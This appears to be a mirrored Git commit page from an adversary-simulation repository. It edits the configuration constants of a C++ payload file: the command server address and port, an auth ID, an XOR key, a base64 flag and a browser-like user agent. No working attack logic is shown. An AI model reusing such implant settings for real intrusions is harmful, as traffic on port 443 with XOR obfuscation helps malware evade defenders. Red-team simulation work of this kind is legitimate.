mirror of
https://github.com/S3N4T0R-0X0/APTs-Adversary-Simulation.git
synced 2026-08-04 09:41:40 +02:00
Update Actual_Payload_HTTP_XOR.cpp
This commit is contained in:
@@ -17,11 +17,11 @@
|
||||
|
||||
#pragma comment(lib, "winhttp.lib")
|
||||
|
||||
const std::string SERVER_IP = "192.168.1.107";
|
||||
const int SERVER_PORT = 2222;
|
||||
const std::string SERVER_IP = "127.0.0.1";
|
||||
const int SERVER_PORT = 443;
|
||||
const std::string AUTH_ID = "df7214d2-02e2-4f9e-b297-872444044a37";
|
||||
const int XOR_KEY = 11;
|
||||
const bool STATUS_BASE64 = true;
|
||||
const int XOR_KEY = 205;
|
||||
const bool STATUS_BASE64 = false;
|
||||
|
||||
const std::string DEFAULT_USER_AGENT = "Mozilla/5.0";
|
||||
std::string PREPEND_OUTPUT = "";
|
||||
|
||||
Reference in New Issue
Block a user